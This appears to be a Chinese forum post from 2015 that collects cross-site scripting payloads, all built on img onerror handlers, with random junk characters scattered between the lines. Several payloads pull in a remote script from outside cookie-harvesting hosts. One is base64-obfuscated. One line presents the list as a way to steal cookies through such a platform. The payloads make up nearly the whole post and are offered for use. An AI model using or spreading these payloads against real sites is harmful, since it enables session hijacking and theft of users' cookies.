<img src='non-exist.jpg'onerror="alert('xss')">6 b" {9 c! F; E
<img src=# onerror=alert(123)>
3 e& F% }, E4 C' e+ V V, z<img src=# onerror=alert(document.cookie)># `1 ~9 V) |8 x7 M; b) z% m8 @) u f5 W
下面是利用平台钓cookie的# M0 N5 Y" ^0 V+ h2 m, q
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>1 Z4 ^) H! ^. C& a
1 O' }$ \: {) ]+ G3 J0 ?* A! O$ ?' V
% {- l4 S: c5 A<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
5 L$ Y# o) p0 r3 w& }0 c<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>3 G1 T8 }1 h: o- O
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>3 d+ s9 f6 Z7 w
<img src=1 onerror=jQuery.getScript("//xss.re/974")> + y& b/ i$ e' Z& c5 O, K
<img src="#">
& w C; S5 L4 ?1 u9 C& R<img src="#">2 q" i8 {$ k, n; T: f
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
7 L! k. a% j3 }* b0 O<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">; D B0 P1 T5 w, o! d
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>
8 y+ a2 ~( X/ [<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>$ H) b( l5 e" g* x: R/ b& g
<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>
6 {1 n8 o' P/ ], ^( p+ `7 q5 U B<img src=x width="0" height="0"></img>8 ?0 C! A9 e+ e9 ~: e0 _
<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>
& \) b5 A* r, F* [0 e0 @7 M<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>" e4 s3 ^& S* [3 L) k* p
|
发表于 2015-10-18 14:33:54
收藏
支持
反对